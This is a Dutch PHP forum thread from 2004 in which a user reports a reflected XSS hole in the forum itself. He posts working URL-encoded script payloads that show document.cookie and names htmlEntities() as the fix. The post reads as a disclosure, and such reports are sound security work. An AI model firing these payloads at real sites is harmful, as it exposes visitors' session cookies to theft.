HTML injection forum
Dit, lijkt mij niet echt de bedoeling op een PHP forum, toch?
http://www.phphulp.nl/forum/showtopic.php?cat=%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Cdiv&id=1
en http://www.phphulp.nl/forum/showtopic.php?cat=7&id=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Natuurlijk weten we hoe het te fixen is, met htmlEntities()
Posten in nietbestaand draadjes is ook niet moeilijk
http://www.phphulp.nl/forum/showtopic.php?cat=7&id=30001
http://www.phphulp.nl/forum/showtopic.php?cat=%22%3E%3Cscript%3Edocument.write(document.cookie)%3C/script%3E%3Cdiv&id=1
en http://www.phphulp.nl/forum/showtopic.php?cat=7&id=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
Natuurlijk weten we hoe het te fixen is, met htmlEntities()
Posten in nietbestaand draadjes is ook niet moeilijk
http://www.phphulp.nl/forum/showtopic.php?cat=7&id=30001
Gewijzigd op 10/10/2004 19:41:00 door PrisonerOfPain
greedyxl:
(cr)(h)acker??????
Hacker, ik probeer te helpen ;) Niet dat ik kwaad wil doen trouwens, anders had ik ze wel verder uitgebuit. Maar hopenlijk word hier een les uit getrokken.
Gewijzigd op 10/10/2004 20:34:00 door PrisonerOfPain